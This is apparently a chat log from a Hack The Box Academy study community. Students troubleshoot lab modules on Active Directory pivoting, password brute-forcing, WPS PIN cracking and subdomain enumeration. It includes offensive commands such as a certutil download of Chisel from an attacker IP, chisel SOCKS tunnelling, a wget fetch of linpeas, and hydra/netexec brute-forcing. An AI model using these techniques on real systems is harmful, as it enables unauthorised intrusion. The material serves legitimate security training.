For AD Enumeration & Attacks - Skills Assessment Part 1 I'm struggling to get a proxy set up. I logged into the Antak webshell (no spoiler), created a rev shell and uploaded Chisel.exe. Absolutely no progress after that because it doesn't seem to be working. Any tips?
||
certutil -f -urlcache -split http://10.10.15.234/Chisel.exe C:\Users\Administrator\chisel.exe
ipconfig (grab network range)
[On Linux host]
└─$ chisel server -v -p 9002 --socks5
2024/11/03 12:56:44 server: Fingerprint Hg+/LqL1YH8w4HYVUTXouCWtH8m7YECuNz8p1Sah8/s=
2024/11/03 12:56:44 server: Listening on http://0.0.0.0:9002
[Back to Windows]
C:\Users\Administrator\chisel.exe client -v 10.10.15.234 socks
... No output||
yo in skill assessment pt 2 it means ssh right?
cuz ftp does not connect for me, also the answer to the first flag is not the one found in the last skill assessment is it?
like in pt 1
try server on the host?
not sure what you mean by that
nvrmind
Try a reverse chisel proxy
Hi there, if we need some "explanation" about a specific part of a module , can we ask here or do we have to DM ? also I notice we do have to be careful with spoilers ?
What module
Windows Event Logs & Finding Evil > Get-WinEvent
You can ask here just don't spoil or post parts of the module content
Alright thank you
I'm not coming up with what that means. Like put the server binary on the windows box like @cloud urchin is suggesting?
I'm attempting Kali -> Windows -> Domain controller so I thought it was Kali (Server) -> Windows (Client) -> DC
The pivoting module goes over it all, you can host the server on your vm, the target, or you can do a reverse proxy to avoid firewall rules etc. I'd suggest going over the chisel portion of the pivoting module again, it gives you the commands and explains it all.
In Windows Event Logs & Finding Evil > Get-WinEvent, about the question at the end: in the powershell command they assume the index number that we need to put for $_.Properties[x]. According to the module, they find this index number from the XML in Windows Event Viewer; however, in the skill assessment we have to look through already saved log files. So I don't understand how I can come up with the index number? If I do the Windows Command Line module, would it be explained in there?
Hello guys, I'm in pentest path > password attacks > network services. I tried and got all the flags except the rdp one. I tried hydra, crackmapexec and a few metasploit modules, but every time I try to crack anything, I always get the same 4 users with their respective passwords. I tried to login with all of them while changing passwords to see if any of the passwords were reused or something. I was able to login to smb through one of these 4 users but rdp is still a mystery to me
How long did these bf take you ?
NEW WPS module
@dapper moth brother care help a fellow citizen ?
Sure
Did these take you also toooo long ?
Not that long
No. brute force is designed not to take too long.
Is anyone doing password attacks module?
Well you are not doing something right
One or another would take a bit longer and I would just open the next section. I couldn't even finish the first paragraph of the next section and it would be done
What exact section is this in?
Early on, section Online PIN Brute-Forcing Using Reaver
Seems pretty straightforward i dont think i have missed anything
Is it stuck!?
I tried the reverse and it connected, but then nothing went through the tunnel. I reverted the boxes again, tried with ligolo-ng, disabled the firewall on the host and now ligolo won't connect. IDK anymore.
Let me try on the next network
That first one should take the longest, but not that long.
It should also iterate over
having also same issues
taking tooo much time
this is strange, command is exactly the same and just having the same outputs as the other student
Second network the same
But jokes aside, perhaps something is wrong
Doesn't it update?
Cause it looks like it's stuck
next module works just fine for me
No its been like this for 10 minutes give or take
Did restarting the vm work for you?
Have you restarted the target?
Mine was straight up
yes, 2 times, but then i just went forward to the next module
next chapter of the module also for me
from the next one, that uses a different target machine
Did your reaver stay stuck as well?
yes
Idk... It took me no time for the first flag.
Third should take almost same amount of time
https://academy.hackthebox.com/module/163/section/1547
if the victim is missing nmap, do I install it? seems to skip over that
Got it now. I guess restart a few times the vm
old school always works
Can anyone confirm that AD Enum skill assessment part can be done without metasploit? I disabled firewall and can't find a way to get chisel or ligolo to connect to my attack machine. I know it's user error but it's not obvious why.
Yes, it can be done without metasploit.
Hello guys! I'm working on the footprinting module and I saw this (image below). Is this correct? I think CIFS uses TCP directly instead of NetBIOS (smb v1 used to operate over NetBIOS). Am I mistaken?
if i recall, I believe I used Hydra for RDP bruteforcing and then logged in via xfreerdp w the credentials you find to get the flag. have you tried that?
there is a pw_attacks file in the resources tab for this specific lab that you have to use when bruteforcing
Ye I used the pw attacks file
I'll take a look at it again
Hello, I'm trying penetration testing process - getting started - privilege escalation. From Pwnbox, I'm trying to upload linpeas.sh to the ssh server. I have started a local http server in the same directory as linpeas.sh, but once I'm on the ssh server, I can't get the file with wget. It just fails and retries over and over.
Thank you
It's through doing that that I get the 4 users
But none of them work even if I switch the passwords around with each other
AD Enumeration & Attacks - Skills Assessment Part I, how do i speed up nmap scan over the network ? it is taking forever (using ligolo-ng)
hello, I have a doubt in the AD Recon module. I think it's more regarding AD basics on the "Forest Trust" concept. If two domains have a tree-root, bidirectional trust, a user from domain X can query any object in domain Z. But I read somewhere that some constraints on these queries can occur if the domains are not on the same network? Does this make any sense?
I think I remember/figured it out. Just finishing a scan to make sure before I say anything
i mean scanning the internal network
How did you end up finding the answer? I'm stuck at the same spot
Ok I got it. I remember struggling with this one too.
Hydra bruteforcing won't give you what you need for this one. I really wanted to use crackmapexec but it wasn't installed on my pwnbox and I couldn't figure out how to get it working properly, but I did come across NetExec which is installed on the pwnbox and is actually a successor to crackmapexec
it works the same way as crackmapexec. Try running a scan using netexec against the target IP w the username and password list they give you.
i confirm that after my 3rd reset/restart works just fine.
can I see your wget ?
I'm gonna go crazy 😄
Subdomain Bruteforcing - Info gathering Web Edition
Using the known subdomains for inlanefreight.com (www, ns1, ns2, ns3, blog, support, customer), find any missing subdomains by brute-forcing possible domain names. Provide your answer with the complete subdomain, e.g., www.inlanefreight.com.
I've been scanning for 30 minutes now , send help 😄
gobuster dns -d inlanefreight.com -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t 30
@urban elk wget http://10.10.14.174:8080/linpeas.sh
that looks fine, what does the failure look like ?
Connecting to 10.10.14.174:8080... failed: Connection timed out.
Retrying.
ok, how are you bringing up your http server ?
maybe double-check if your VPN IP is still .14.174 - it might have changed without you noticing, it's happened to me
python3 -m http.server 8080
yeah, you're doing everything right as far as I can tell. Might be something silly like that
nice username btw 🙂 I knew a guy who'd say "lets perform an exorcism" every time he drank a duvel
🙂
Is it better to use netexec for the others too?
Bc at this point I'm thinking I have some trouble with my gpu
I let the password mutations room run for like 20 minutes on all services and it didn't give a password